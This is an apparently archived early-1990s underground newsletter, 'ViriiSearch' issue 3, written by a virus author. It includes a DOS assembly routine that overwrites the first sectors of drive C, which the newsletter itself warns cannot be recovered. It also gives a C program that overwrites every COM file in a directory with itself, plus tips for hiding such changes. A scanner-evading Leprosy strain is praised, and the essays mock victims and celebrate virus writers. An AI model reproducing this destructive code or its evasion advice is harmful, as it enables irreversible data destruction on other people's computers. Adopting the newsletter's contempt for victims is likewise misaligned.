textfiles/virus/vir-3.v1

1218 lines
58 KiB
Plaintext
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

DISCLAIMER:
The author will NOT accept responsibility for any damage to your
computer media and/or files, or responsibility for any action you might
take that will result in legal proceedings, the source code, if any, in
this newsletter is THE REAL THING, and you, after you read this, will be
well aware of what virii are capable of, and knowing that, it is expected
that you will act responsibly.
DISCLAIMER II:
All I know about programming I have learned on my own, and did not go to
school for, and am still learning. As a result, I am sometimes prone to
make mistakes, and be wrong about things, so please be patient if I should
make a mistake, or say something that isn't true, which would be totally
unintentional.
ViriiSearch
-----------
The Virus Research Newsletter
Volume 1, Number 3
Date: 08/02/92
CREDITS:
-----------------------------------------------------------------------------
Author...................................................Criminal Minded <tm>
Editor...................................................Criminal Minded <tm>
Ideas, Source, Examples Supplied By......................Criminal Minded <tm>
Facts Stolen From Several Sources By.....................Criminal Minded <tm>
-----------------------------------------------------------------------------
Introduction:
Welcome To The Third Issue Of Viriisearch, The Virus Research Newsletter. In
this issue you will find some changes, the layout has been changed slightly,
there are some new sections, and it's more organized. Let me know how you
like the changes, thanks!
In this issue:
-----------------------------------------------------------------------------
DEPARTMENTS: | FEATURES:
-----------------------------------------------------------------------------
In The News | Soviet Virii Attacks
| NASA's "No Nukes Worm"
| The Senate's Virus Bill
-----------------------------------------------------------------------------
Programming Shop | Absolute Disk Reads/Writes
-----------------------------------------------------------------------------
Programming Shop - Dissection Dept. | Explanation Of Above Example
-----------------------------------------------------------------------------
The Machine Shop | The Bootstrap Routine
-----------------------------------------------------------------------------
Sample Source Code Of Virii | A Replication Experiment
-----------------------------------------------------------------------------
"Suicidal Tendencies" Dept. | Leprosy (Strain C)
-----------------------------------------------------------------------------
Virus Info | The Devil's Dance Virus
-----------------------------------------------------------------------------
Articles | Unique Virii Names/Ideas
|------------------------------------
| Assembly vs C Language Virii
|------------------------------------
| My Profile Of A Virus Writer And
| My Views On The Virii Law
|------------------------------------
| Are Virii REALLY A Problem? And For
| Who?
|------------------------------------
| The Brain Virus: Fact And Fantasy
-----------------------------------------------------------------------------
Final Notes | Special Thanks, Greetings, Etc.
-----------------------------------------------------------------------------
In The News:
------------
-----------------------------------------------------------------------------
Welcome to a new section of Viriisearch! In this section we will cover virii
that made the news, old and new. Hope you enjoy the new section!
-----------------------------------------------------------------------------
The U.S.S.R. is already suffering from an outburst of computer viruses and
crimes. Computer users should look to U.S. experiences to learn about
information security before the problem escalates even further. Pirated
software is prevalent in the Soviet Union, purchased from Hong Kong and
Swiss connections. The existence of numerous viruses has been confirmed
by Soviet and Eastern Europe anti-viral programmers and include Yankee
Doodle, Disk Killer 170X, Jerusalem, Friday The 13th COM and Victor, to
name a few. Three available antivirus programs are Lozynkv's Aidstest and
Kotik's Anti-Kot and Anti-Kor. Western and home-grown antivirus programs
are also being used. A lack of trained data security experts and data
security support services only make the problem worse. The situation is
likely to worsen before serious measures are taken to combat both viruses
and crime. Decisions about protecting information are not being developed
either.
"Bozhe Mov! Hackers and viruses already plague Soviets."
Originally written by Sanford Sherizen.
Computerworld August 20th 1990, Page 74.
-----------------------------------------------------------------------------
This next "In The News" Article is about a worm, not a virus, but I found it
interesting and decided to re-print it.
-----------------------------------------------------------------------------
DEC users are warned by the U.S. Department of Defense's Computer Emergency
Response Team (C.E.R.T) that a worm discovered on a NASA computer network in
the third week of Oct. 1989 may find it's way onto other DECnet networks. The
worm changed system banners to display an antinuclear message, and thus was
called the 'No Nukes Worm' by one NASA official. The program entered NASA's
Space Physics Analysis Network (S.P.A.N) through the DECnet Internet series
of networks that links approximately 13,000 computers, government agencies,
research centers, universities, and other facilities. DEC spokesman Jef
Gibson said that VAX/VMS system managers should have closed the loophole
through which the worm gained access after it was discovered in Dec. 1988.
NASA believes the worm may have been intended to protest the launch of the
Atlantis space shuttle that carried a plutonium powered probe on it's way to
Jupiter.
"Worms eats holes in NASA's DECnet; 'No Nukes Worm' replaces system banners
with antinuclear message"
Originally written by Michael Alexander and Maryfran Johnson.
Computerworld October 23rd 1989. Page 4.
-----------------------------------------------------------------------------
A Senate bill updating the Computer Fraud and Abuse Act of 1986 is being
praised by computer and legal experts, but it's passage could encourage
lawsuits against innocent institutions. The bill redefines the notion of
computer 'access' to cover the intentional transmission or distribution of
unauthorized applications that somehow cause damage to either hardware,
software, or data. Intentional abusers face felony charges with penalties
up to five years in prison and a $250,000 fine. The reckless, albeit,
unintentional transmission of virus-ridden software could result in a
misdemeanor charge and up to one year in jail and a $5,000 fine. The reach
of the previous law would also be extended to include computers used in
interstate communications or commerce. A U.S. Department of Justice official
says the bill grants prosecutors greater flexibility.
"Virus bill raises hopes, fears: updated laws could hold unwitting transmi-
tters liable for damages. (Computer Fraud and Abuse Act of 1986)"
Originally written by Gary H. Anthes.
Computerworld August 13th, 1990. Page 45.
-----------------------------------------------------------------------------
Programming Shop:
-----------------
*****************************************************************************
First we will cover absolute disk reads/writes using Assembly language.
*****************************************************************************
This next example will write the contents of 'buffer' to the first ten
sectors of drive C:
*****************************************************************************
WARNING: There is NO recovery from this.
*****************************************************************************
abswrite proc near
buffer db 'Lick Me' dup (?)
mov al,2
mov cx,10
mov dx,1
mov bx,seg buffer
mov ds,bx
mov bx,offset buffer
int 26h
jc error
add sp,2
abswrite endp
*****************************************************************************
Next is absolute disk read(s)
*****************************************************************************
absread proc near
buffer db 512 dup (?)
mov al,2
mov cx,10
mov dx,1
mov bx,seg buffer
mov ds,bx
mov bx,offset buffer
int 25h
jc error
add sp,2
absread endp
*****************************************************************************
Programming Shop - Dissection Dept.
*****************************************************************************
absread proc near
buffer db 512 dup (?)
mov al,2
mov cx,10
mov dx,1
mov bx,seg buffer
mov ds,bx
mov bx,offset buffer
int 25h
jc error
add sp,2
absread endp
*****************************************************************************
First we will discuss absolute disk read(s).
The line "mov al,2" is telling which drive we want to read from. Drive #2 is
drive C.
The next line, "mov cx,10" is telling how many sectors we want to read (10)
The line, "mov dx,1" is telling the starting sector number to start reading
at. (1)
The next three lines:
mov bx,seg buffer
mov ds,bx
mov bx,offset buffer
establish the address of the buffer, and then DS:BX point to the
segment:offset of the buffer.
The next line, "int 25h" is the function number of the "absolute read"
function.
The next line, "jc error" jumps if there is an error.
and the last line, "add sp,2" clears the stack.
Notes: The purpose of clearing the stack using "add sp,2" is because, when
function int 26h returns, the CPU flags originally pushed onto the stack by
int 26h are still on it. You should clear it to prevent uncontrolled stack
growth and to make available any other values pushed onto the stack before
the call to int 26h.
*****************************************************************************
Next we will discuss absolute disk write(s) and the difference between the
two functions, read and write.
*****************************************************************************
As you can see, there is little difference between the two:
Absolute Read: Absolute Write:
_____________________________________________________________________________
absread proc near | abswrite proc near
buffer db 512 dup (?) | buffer db 'Lick Me' dup (?)
mov al,2 | mov al,2
mov cx,10 | mov cx,10
mov dx,1 | mov dx,1
mov bx,seg buffer | mov bx,seg buffer
mov ds,bx | mov ds,bx
mov bx,offset buffer | mov bx,offset buffer
int 25h | int 26h
jc error | jc error
add sp,2 | add sp,2
absread endp | abswrite endp
-----------------------------------------------------------------------------
Absolute disk read and absolute disk write are identical except for four
lines:
Note: Periods replace the lines in each example that are identical.
-----------------------------------------------------------------------------
absread proc near | abswrite proc near
buffer db 512 dup (?) | buffer db 'Lick Me' dup (?)
. | .
. | .
. | .
. | .
. | .
. | .
int 25h | int 26h |
. | .
. | .
absread endp | abswrite endp
-----------------------------------------------------------------------------
The differences in the above examples are as follows:
The first line: This is the beginning of each procedure. They are named for
what they do, absread for absolute read and abswrite for absolute write. You
could've named the two procedures something else, for instance: shithead and
dickhead, and it wouldn't matter.
The second line: In the case of absolute read, we have our buffer declared as
512 bytes and not initialized. In the case of absolute write, we have the
buffer initialized to store the string 'Lick Me'.
The ninth line: This line is the function number, int 25h being the function
number for absolute disk read, and int 26h being the function number for
absolute disk write.
The twelfth line: This is just the end of each of the two procedures.
*****************************************************************************
The Machine Shop:
-----------------
-----------------------------------------------------------------------------
Welcome to a brand new section of Viriisearch! Here we will discuss hardware
oriented subjects, such as RAM, Machine Cycles, Boot Routines, etc.
-----------------------------------------------------------------------------
This month we will discuss the 'Bootstrap' routine.
-----------------------------------------------------------------------------
Many people turn on their machines, let DOS load and don't think a second
thought about it. Those people also take MS-DOS for granted and don't even
care what it it doing, even though it is the most important piece of software
a IBM user can have. One of my favorite sayings: 'A Computer Without MS-DOS
Is Little More Than A Boat Anchor'
Here I will tell exactly what MS-DOS does from the second you hit the power
switch up until the time you get the prompt --> C>
When the system is started or reset, program execution begins at address
0FFFF0H. This is a feature of the 8086/8088 family of microprocessors and
has nothing to do with MS-DOS. Systems based on these processors are design-
ed so that address 0FFFF0H lies with an area of ROM and contains a jump mach-
ine instruction to transfer control to system test code and the ROM bootstrap
routine.
The ROM bootstrap routines reads the disk bootstrap routine from the first
sector of the system startup disk (the boot sector) into memory at some
arbitrary address and then transfers control to it. (The boot sector also
contains a table of information about the disk format.)
The disk bootstrap routine checks to see if the disk contains a copy of
MS-DOS. It does this by reading the first sector of the root directory
and determining whether the first two files are IO.SYS and MSDOS.SYS (or
IBMIO.COM and IBMDOS.COM), in that order. If these files are not present,
the user is prompted to change disks and strike any key to try again. If
the two system files are found, the disk bootstrap routine reads them into
memory and transfers control to the initial entry point of IO.SYS. (In some
implementations, the disk bootstrap routine reads only IO.SYS into memory,
and IO.SYS in turn loads the MSDOS.SYS file.)
The IO.SYS file that is loaded from the disk actually consists of two separ-
ate modules. The first is the BIOS, which contains the linked set of resident
device drivers for the console, auxiliary port, printer, block, and clock de-
vices, plus some hardware specific initialization code that is run only at
system startup. The second module, SYSINIT, is supplied by Microsoft and lin-
ked into the IO.SYS file, along with the BIOS, by the computer manufacturer.
SYSINIT is called by the manufacturer's BIOS initialization code. It determ-
ines the amount of contiguous memory present in the system and then relocates
itself to high memory. Then it moves the DOS kernel, MSDOS.SYS, from it's or-
iginal load location to it's final memory location, overlaying the original
SYSINIT code and any other expendable initialization code that was contained
in the IO.SYS file.
Next, SYSINIT calls the initialization code in MSDOS.SYS. The DOS kernel in-
itializes its internal tables and work areas, sets up the interrupt vectors
20H through 2FH, and traces through the linked list of resident device driv-
ers, calling the initialization function for each. These driver functions
determine the equipment status, perform any necessary hardware initialization,
and set up the vectors for any external hardware interrupts the drivers will
service.
As part of the initialization sequence, the DOS kernel examines the disk par-
ameter blocks returned by the resident block-device drivers, determines the
largest sector size that will be used in the system, builds some drive par-
ameter blocks, and allocates a disk sector buffer. Control then returns to
SYSINIT.
When the DOS kernel has been initialized and all the resident device drivers
are available, SYSINIT can call on the normal MS-DOS file services to open
the CONFIG.SYS file. This optional file can contain a variety of commands
that enable the user to customize the MS-DOS environment. For instance, the
user can specify additional hardware device drivers, the number of disk buf-
fers, the maximum number of files that can be open at one time, and the file
name of the command processor (shell).
if it is found, the entire CONFIG.SYS file is loaded into memory for process-
ing. All lowercase characters are converted to uppercase, and the file is in-
terpreted one line at a time to process the commands. Memory is allocated for
the disk buffer cache and the internal file control blocks used by the handle
file and record system functions. Any device drivers indicated in the CONFIG
file are sequentially loaded into memory, initialized by calls to their init
modules, and linked into the device driver list. The init function of each
driver tells SYSINIT how much memory to reserve for that driver. After all
installable device drivers have been loaded, SYSINIT closes all file handles
and reopens the console (CON), printer (PRN), and auxiliary (AUX) devices as
the standard input, standard output, standard error, standard list, and sta-
ndard auxiliary devices. This allows a user-installed character device driver
to override the BIOS's resident drivers for the standard devices.
Finally, SYSINIT calls the MS-DOS EXEC function to load the command interpr-
eter, or shell. (The default shell is COMMAND.COM, but another shell can be
substituted by means of the CONFIG.SYS file.) Once the shell is loaded, it
looks for AUTOEXEC.BAT, automatically running any internal DOS commands and
external commands inside that file. If it doesn't find AUTOEXEC.BAT it will
ask for the date and time (providing a clock chip isn't present) and then
displays the prompt, waiting for the user to enter a command. MS-DOS is now
ready for business, and SYSINIT is discarded.
-----------------------------------------------------------------------------
Sample Source Code Of Virii:
----------------------------
-----------------------------------------------------------------------------
This month we will discuss something I have been fooling around with and have
finally completed. It is not a virus, but can be modified and made into one.
What the following code basically does is find all the COM files in the curr-
ent directory, and overwrites them with itself. It's basically a replicating
program.
-----------------------------------------------------------------------------
#include <malloc.h>
#include <direct.h>
#include <dos.h>
#include <fcntl.h>
#include <sys\types.h>
#include <sys\stat.h>
#include <io.h>
#include <stdio.h>
FILE *file1,*file2;
int main(void);
main()
{
long size;
char *code = NULL;
struct find_t com_file;
_dos_findfirst("*.COM", _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &com_file);
chmod(com_file.name, S_IREAD|S_IWRITE);
file1=fopen("HELLO.EXE","rb");
file2=fopen(com_file.name,"wb");
size=filelength(fileno(file1));
code=malloc(size);
fread(code, size, 1, file1);
fwrite(code, size, 1, file2);
while (_dos_findnext(&com_file) == 0)
{
chmod(com_file.name, S_IREAD|S_IWRITE);
file2=fopen(com_file.name,"wb");
fwrite(code, size, 1, file2);
}
fcloseall();
free(code);
}
-----------------------------------------------------------------------------
Ok, this line:
_dos_findfirst("*.COM", _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &com_file);
finds the first occurence of a COM file with any of the attributes listed.
They are "ORed" together using the | character. It passes the filename to
the "com_file" structure, and references to that file are now: com_file.name
Upon one being found, it goes onto:
chmod(com_file.name, S_IREAD|S_IWRITE);
which changes the attributes of the file found to that it can be written to.
The next line opens the file you want to replicate in "read binary" mode, that
it what the "rb" switch is for.
file1=fopen("VIRUS.EXE","rb");
Then it opens the first COM file, the 'victim' to be overwritten, in "write
binary" mode (that's what the "wb" is for)
file2=fopen(com_file.name,"wb");
Then it obtains the size of the virus and allocates enough memory for it.
size=filelength(fileno(file1));
code=malloc(size);
Then it reads the virus code into the buffer "code" which is size "size", is
1 item, and is reading it from "file1"
fread(code, size, 1, file1);
Then it takes "code" which is size "size", is 1 item, and writes it to "file2"
fwrite(code, size, 1, file2);
Once it is done with that, it goes onto the loop:
while (_dos_findnext(&com_file) == 0)
{
chmod(com_file.name, S_IREAD|S_IWRITE);
file2=fopen(com_file.name,"wb");
fwrite(code, size, 1, file2);
}
Both _dos_findfirst() and _dos_findnext return 0 if they are successful at
finding the specified file, so basicall this loop is saying:
"keep going as long as _dos_findnext(&com_file)) equals 0"
What it does every time it passes through the loop (i.e. - finds a COM file):
changes the mode of the file so it can be written to, opens that file in
"write binary" mode, and writes the virus code to it.
When there are no more COM files found, the loop is done and it goes onto the
next part of the program:
fcloseall();
free(code);
}
it closes all open files associated with this program, releases the previous-
ly allocated memory for the virus code, and exits.
-----------------------------------------------------------------------------
NOTES:
This is kind of slow but is somewhat faster than the example in issue #2 that
truncated files to 0 bytes. You can also fool around with getting and setting the file's
date and time, and changing it's size back to what it was originally to cover
your tracks.
-----------------------------------------------------------------------------
Suicidal Tendencies Dept/Virus Of The Month:
-----------------------------------------------------------------------------
The virus of the award month goes to: Leprosy (C Strain)
-----------------------------------------------------------------------------
NOTE: This is actually Leprosy - B Strain , but modified by TBSI so McAffee's
scanner wouldn't find it. Originally written by PCM2 in August of 1990.
Modified by TBSI in June of 1991.
PCM2, The person who wrote this, and all other strains of Leprosy, did a real
nice job with this one. I placed the file, LEPROSYC.COM, on a 5.25 360K
floppy in drive B and this is what was on the disk:
Volume in drive B has no label
Directory of B:\
COMMAND COM 47845 04-09-91 5:00a
ANSI SYS 9029 04-09-91 5:00a
RAMDRIVE SYS 5873 04-09-91 5:00a
CONFIG SYS 39 01-01-80 12:35a
SYS COM 13440 04-09-91 5:00a
NDOS COM 2419 08-14-84 12:00p
MEM EXE 39818 04-09-91 5:00a
DEBUG EXE 21692 06-07-90 2:24a
AUTOEXEC BAT 69 01-01-80 3:37a
PKUNZIP EXE 23528 03-15-90 1:10a
LEPROSYC COM 666 06-05-91 12:36a
11 file(s) 164418 bytes
192512 bytes free
This is BEFORE I ran the virus...this is after:
Volume in drive B has no label
Directory of B:\
COMMAND COM 47845 04-09-91 5:00a
ANSI SYS 9029 04-09-91 5:00a
RAMDRIVE SYS 5873 04-09-91 5:00a
CONFIG SYS 39 01-01-80 12:35a
SYS COM 13440 04-09-91 5:00a
NDOS COM 2419 08-14-84 12:00p
MEM EXE 39818 04-09-91 5:00a
DEBUG EXE 21692 06-07-90 2:24a
AUTOEXEC BAT 69 01-01-80 3:37a
PKUNZIP EXE 23528 03-15-90 1:10a
LEPROSYC COM 666 06-05-91 12:36a
11 file(s) 164418 bytes
192512 bytes free
There is not one single difference with any of the files, yet EVERY .EXE and
.COM file on the disk was infected. No changes in size, no date/time changes.
Well, the dates and times did change but the virus preserves the original date
and time stamps, restoring them once the infection is complete. But no changes
in file sizes.....this virus was very well written. It was fast, efficient,
and very small in size. The source code to this particular virus is 16664
bytes, and, as you can see, the .COM file is only 666 bytes. This is what the
virus did when run: It accessed drive B for a few seconds, and gave me the
error message: Program too big to fit into memory. I did not notice any
changes at all so I assumed it didn't infect any of the files, but when I ran
each .EXE and .COM file on the disk, they all gave me that error message...
'Program too big to fit into memory' so I assume they all were infected.
The program is actually supposed to give me this message when it is done:
ATTENTION! Your computer has been afflicted with
the incurable decay that is the fate wrought by
Leprosy Strain B, a virus employing Cybernetic
Mutation Technology(tm) and invented by PCM2 08/90.
For some reason it did not display this message. Perhaps there is a certain
amount of files it must infect before it displays it. I did not take too
good of a look at the source to determine this. All in all a very nicely
written virus, does it's job fast and very efficiently.
-----------------------------------------------------------------------------
Virus Info:
-----------
-----------------------------------------------------------------------------
Welcome to a brand new section of Viriisearch! In this section we will give
valuable information on a virus, such as origin, aliases, etc. Some of the
info presented here is taken from the file: MSDOS.ZIP, a index of DOS virii.
Other info presented was supplied by me, such as the scan string, name of
virus author, etc.
-----------------------------------------------------------------------------
Virus Spotlight This Month Will Cover: The Devil's Dance Virus
*****************************************************************************
Name Of Virus: The Devil's Dance Virus
Virus Aliases: Devil/941 Virus
Name Of Virus Author: N/A
Language Virus Was Written In: N/A
Date Virus Was First Discovered Or Originated: Spring of 1990
Place Virus Was First Discovered Or Originated: Mexico City
Scan String:
0L0G0M0H0G1U0G0R0HBK2MDY3Y0G0G4MCU0G2LDG1Y4LCU0G2L0G2MBR4SDNFLDN8H3XFW4XBW5U0
G2L1WDNFGFM0H0JBR0G0Q6MAV0G0M6GFK0G0MBV7W0G0M6GFK0G0M7Z0G0M9SEJBZ1L0G0M5S0G2L
1L0G0M1L0G0MEW0G0MBR0M0MAW4Q0K0G0G
Checksum: CF3C
Hooked Interrupts: INT 21H, functions 4B00H and 49H, INT 09H
Trigger: Upon INT 21H, function 4B00H, being called, the .COM file will be
infected. Also, if you hit the CTRL-ALT-DEL sequence anytime after
typing a total of 2,500 characters, the first sector of drive C will
be overwritten.
Identification: If you do a hexadecimal dump of the virus, the following:
"Drk" & "*.com"
should be seen in the code.
Also, the time and date of the infected file is set to the
time and date of infection.
If you rest the system by pressing CTRL-ALT-DEL, the virus
will display the following message:
"Have you ever danced with"
"the devil under the weak light of the moon?"
"Pray for your disk! The_Joker..."
"Ha Ha Ha Ha Ha Ha Ha Ha Ha Ha".
If your monitor/card supports color, all characters typed
will be in a different color.
Size & Name Of Original Virus EXE/COM File: N/A
Techniques Used: All file attributes are removed and the following message is
encrypted:
"Have you ever danced with"
"the devil under the weak light of the moon?"
"Pray for your disk! The_Joker..."
"Ha Ha Ha Ha Ha Ha Ha Ha Ha Ha".
What It Attacks:
.COM Files: Yes
.EXE Files: No
COMMAND.COM: Yes (If in the current directory when virus is first run, or if
COMMAND.COM is run)
Boot Sector: No
File Allocation Table (FAT): No
Fixed Disk Partition Table: No
Note: The Boot Sector, FAT, or Fixed Disk Partition Table MAY be attacked if
any of them reside on the first sector of drive C because the virus
does attack that part of the drive. (See Damage Report)
It depends on your drive and what resides in the first sector.
Change In Size/Date/Time Of Infected File: 941 bytes, Date & Time Is Changed
According To The System's Date And
Time At The Time Of Infection.
Virus Volume Label: None
Known Number Of Strain(s): None
Damage : When the virus is first run, it will infect ALL the .COM
files in the current directory. After pressing 2,500 keys,
if you should reset the system by pressing CTRL-ALT-DEL, the
virus will overwrite the first sector of drive C. Also, any
.COM file you run will be infected. If the .COM file infected
is bigger than 64,337 bytes, it will not run correctly after
being infected.
*****************************************************************************
---------
Articles:
---------
****************************
* Unique Virii Names/Ideas *
****************************
I was looking at some virii names recently, and I noticed that a few of them
are pretty stupid...like 'Fuck you' or 'Fuck Me' or 'Phuck'....it does not
take too much intelligence to think up these names so that's why I decided
to include this article in this month's Viriisearch <tm> and here are some
virii names and ideas that I thought of:
-----------------------------------------------------------------------------
Stolichnaya - Maybe we could have this one display a picture of Kitty Dukakis
as it deletes your files or trashes your hard drive.
Valhalla - For those of you who don't know, Valhalla is the Viking Heaven.
To be honest, I didn't really put much thought into what this
would do as a virus.....I just like the name and though it
might be a cool name for a virus.
Red Sector A - This is a song by Canadian Power Trio, Rush. Perhaps this can
overwrite the boot sector with the lyrics to the song. Maybe
have it pick randomly from a list of tour dates from the 'Roll
the bones' tour as it's trigger date.
4th Of July - We have virii for Christmas, Columbus Day, etc....but I have
not seen one called 4th Of July....so here we are...
Blizzard - We could have this annoy the user with random 'snow' on the
monitor which gradually gets worse and worse until you can no
longer see the screen. While it is doing that and flashing
fake error messages, it can eat some files or encrypt the file
allocation table or something. We can also have it's trigger
date as the date that the Blizzard of '78 hit...
*****************************************************************************
********************************
* Assembly vs C Language Virii *
********************************
Most C language functions are written in Assembly, so some consider C a
modified Assembly language....and some also claim that a well written C
program is almost as fast as Assembly. This may be true, but when it comes
to writing a virus, I say Assembly is the winner hands down. Earlier we had
discussed the "Leprosy-B" virus. The Assembly source code to that virus is
16664 bytes and the .COM is a remarkable 666 bytes. If I tried to write that
virus in C language, the smallest I could get the .COM or .EXE file would be
about 8 kilobytes if I was lucky. In a previous issue, we discussed my ATTRB
program which is about 3K in source, and a 9K executable, and that is really
good for C language...here we have a .COM file smaller than the source code.
Well over 20% smaller.
*****************************************************************************
*********************************
* My Profile Of A Virus Writer *
* And My Views On The Virus Law *
*********************************
A lot of people may wonder why someone would want to write a virus. Some
people believe it's a former employee wanting revenge against his company.
Others believe that it's a personal vendetta against a fellow computer user
or the sysop of a BBS, or a student wishing to piss his teacher off. Some or
all of these may be true, but I personally believe that one person cannot
possibly mad at all of the computer society. So, why would someone want to
write a virus? Well, Phalcon/Skism (Canada) claim they do it to 'make the
lives of the anti-viral people a living hell' so there's one reason. I also
believe they do it because THEY CAN. That's it. They do it because they know
how. I don't see the average virus writer as a basket case genius egomaniac
as a lot of people do, I see them as a ordinary every day person with very
good programming abilities and nothing more. I do not sympathize with any
person that gets hit by a virus, either. I sit there and laugh alongside the
person who wrote the virus. Sound cruel? Well, I have my reasons. People know
they exist, and all the information they need to protect themselves and
prevent virus attacks is all right there for the taking. Not just in the
underground so there is no excuse why these people cannot obtain these
materials....If you take the proper precautions and steps, a virus attack
will never happen on your machine and if a real intelligent one comes along
that is able to sneak by a virus scanner and/or disable a virus scanner's
method(s) of scanning, and your hard drive is wiped clean, that's what back
ups are for. If you are one of those people who don't want to take the time
to backup, or think backing up is 'for wimps' (as someone had said once - I
am not sure if they were serious or not) when you lose everything just bend
over and kiss your sorry ass goodbye. Anyway, back to the topic of this art-
icle: Why would someone want to write a virus? I already covered some of the
reason why one would want to do this, and covered my reason why they do it.
The average virus writer writes his virus in the hopes some sap doesn't listen
to all the warnings and runs software downloaded from a BBS without scanning
it for a known virus first and gets hit by it. Then he sits there and laughs
his ass off. And I don't blame him. And as for all this law bullshit about
computer virii (The Computer Fraud And Abuse Act Of 1986) I have to laugh
about that, too....I don't really see computer virii as a major threat to
much of anything. It all depends on how you look at it I suppose. I see it
this way: A favorite book of yours gets stolen or destroyed. You have another
copy of it. Do you care about the stolen/destroyed one? Yes, slightly, but
not as much if the stolen/destroyed one had been your only copy. Same with
software. That's why I think the law(s) concerning virii is ridiculous. Now
only if they put that much effort into more serious crimes, like murder, rape
and drugs. In the article earlier, they mentioned a sentence of five years
in jail and a $250,000 fine...for what? Contaminating some bureacrats PC and
destroying his list of drugs growing in his backyard? And look at Robert T.
Morris Jr. He found a loophole in ARPANET, wrote and released a worm that
hogged all the memory and forced thousands of machines to be shut down for
up to ten days or so. So what? Did he deserve what they gave him? He was
thrown out of school, forced to pay $10,000 in fines, perform 400 hours of
community services, and was on 3 years probation. I do not agree with this
at all whatsoever. The reason why he got such a stiff sentence for such a
minor crime, if you can call it a crime at all, is because the government
had a interest in the network Morris interrupted. Morris didn't even have
malicious intent. They should be glad that HE, and not someone else who might
have had malicious destruction in mind, showed them the security loopholes in
the system. Instead they fine him, make him do community services (which was
probably cleaning some rich bureacrats pool or trimming his lawn) and place
him on 3 years probation hoping he fucked up again so they could make more
money and wouldn't have to worry about their lawns or pools for another few
weeks.
*****************************************************************************
*******************************
* Are Virii Really A Problem? *
* And For Who? *
*******************************
This is a question I present to the bureacrats and lawmakers: Are virii a
REAL problem? And for who are they a problem? I think they are blowing the
whole thing way out of proportion and making people into criminals who are
not criminals. Let's say you rip out asbestos for a living, and you get
sick from it. Would you call the person that makes the asbestos a criminal?
No, of course not. Asbestos is just a hazard of the job. If your job deals
with computers, consider computer virii as just a hazard of the job. It's a
chance you take. If you don't want to take the risk, either find another
career or take the proper precautions to prevent a virus attack. Just like
the person who works with asbestos every day, he wears a mask, and gloves so
he doesn't get sick. So equip yourself with a real good scanner, be real
careful about where and who you get your software from and stop calling the
people who write virii 'criminals' and treating them like they are. Or if you
are too damn lazy to take the proper precautions, just have a backup at all
times. Should you get attacked by a virus, clean up the computer and install
everything again. I am, of course, referring to personal PCs...and not main-
frames, or networks....this is what I have to say about them: If Internet or
NASA's network should get attacked and disabled again, I say the institutions
and people who pay to use those networks should sue NASA or the people who
run Internet because they are the real criminals for not taking steps to make
sure this didn't happen again. It's kind of like this: If you left your front
door open with a $800 VCR and a $500 TV clearly in view, do you think it would
still be there when you got home? No, of course not, so you lock your door and
equip your home with a expensive alarm system. Why these people who scream
computer crime every time their system gets attacked don't have more secure
systems is beyond me. Instead of crying for anti-virus laws they should spend
more time making the security on their network or mainframe even tighter. The
answer to the question 'Are virii a REAL problem?' is NO....at least to me.
People make into a problem. 'A problem for who?' Lazy virus illiterate people
who don't know any better....that don't bother securing their systems. To me
that's their own damn fault and THEY should be brought up on charges. Maybe
we should have a new law...'The virus ignorance law'
Section 51-A Of The 1986 Computer Fraud And Abuse Act Of 1986 Clearly States
That You, If Found Guilty Of Virus Ignorance, Could Be Sentenced To Up To 5
Years In Jail, $500,000 In Fines, 800 Hours Of Cleaning Virus Ridden Computers
And 2 Years Probation.
After all, wouldn't you consider sitting there with your head firmly wedged
up your ass as your computer gets invaded by a virus, computer abuse?
I do.
*****************************************************************************
This one is for Midnight Cowboy.
This was taken from a book and re-printed WITHOUT permission from the author.
*****************************************************************************
*******************************
* The Brain Virus: Fact And *
* Fantasy *
*******************************
The Brain virus has the distinction of being the first computer virus
to strike in the United States outside of a test laboratory. According
to Ms. Ann Webster of the Academic Computer Center of the University of
Delaware in Newark, Delaware, it was reported to the Computer Center on
October 22, 1987. It was found in other locations on the campus one or
two days later. It was named the Brain virus because it wrote that word
as the disk label on any floppy disk it attacked. After the initial an-
alysis of this computer virus on an infected disk two names, Basit and
Amjad, and their address in Lehore, Pakistan, was found. Because of this,
the virus has also been called the Pakistani virus. Many misconceptions
exist about this virus because of incomplete and/or inaccurate statements
that appeared in newspapers. Most of the newspaper and popular magazine
writers did not have any computer knowledge and some were eager to seek
"horror stories: so that their articles would be different. Even the co-
mputer trade and professional publications have included errors in their
accounts of this virus. Some of the professional writers, both in the US
and abroad, based their articles on previously published information. Most
did not have a working copy of the Brain and even the few who did, failed
to fully analyze the actual programs code. In our Microcomputer Security
Laboratory we have several copies of the Brain virus obtained from diff-
erent sources. We have spent many hours running the Brain virus, explor-
ing it's different methods of infection, testing it's interaction with
different media and isolating the virus so that we could produce an as-
sembly language listing. We have also discussed its code and infection
methodology with virus researchers. Therefore we hope to clear up some
current confusion.
Some Characteristics of the Brain
----------------------------------
1. The brain has been called benign in the press. Yet, Ms. Webster reported
that the files on a number of infected disks were destroyed. The virus
at times was destructive. It is impossible to be both. This oxymoron can
be explained by the fact that the virus may remain on the floppy disk
without doing any damage. But at times it has been activated so that it
destroys the file allocation table (FAT) that provides information to the
operating system as to the location of all files on the disk. It would be
stretching the dictionary meaning of benign to say that because the cont-
ents of the disk can be reconstructed, no damage has been done. To under-
stand the reconstruction problem, suppose we have a set of 30 company re-
ports, approximately 20 pages each, all typed within the same margins on
the same paper, not page numbered, not clipped, and with no other copy
available. Left near an open window, these 600 pages are blown over a
wide area with no order preserved. Now, put them back in order. Because
the actual data on the floppy disk have not been destroyed, it is poss-
ible to use a utility, such as PC Tools, or the Norton Utilities, to read
each sector. The appropriate sectors can be moved to another disk in an
approximate sequence to replicate the original documents. This is a del-
icate and tiresome task.
2. The Brain virus does not notify the user that the disk has been infected
immediately before it ruins a disk. The user is never made aware that the
disk has been infected. The virus can remain on an infected disk without
damaging it, but there is always a risk of unannounced disaster.
3. There is NO ransom demand made by the Brain (See Note 1).
4. The Brain virus code is written so that it will never infect a hard disk.
It is media specific; it will attack only double-sided, nine sectored
floppy disks that have been formatted under some version of DOS.
5. The virus can infect a microcomputer and spread to floppy disks even if
the boot disk is NOT infected. If a non-bootable infected disk is used
in an attempt to boot a system, the following message will be displayed
on the screen:
Please Insert A Bootable Disk
The Type [Return]
By that time the virus has already hidden itself in RAM memory. Using a
clean bootable disk to start the system will result in that disk becom-
ing infected. (See Note 2). The virus will then spread to any other fl-
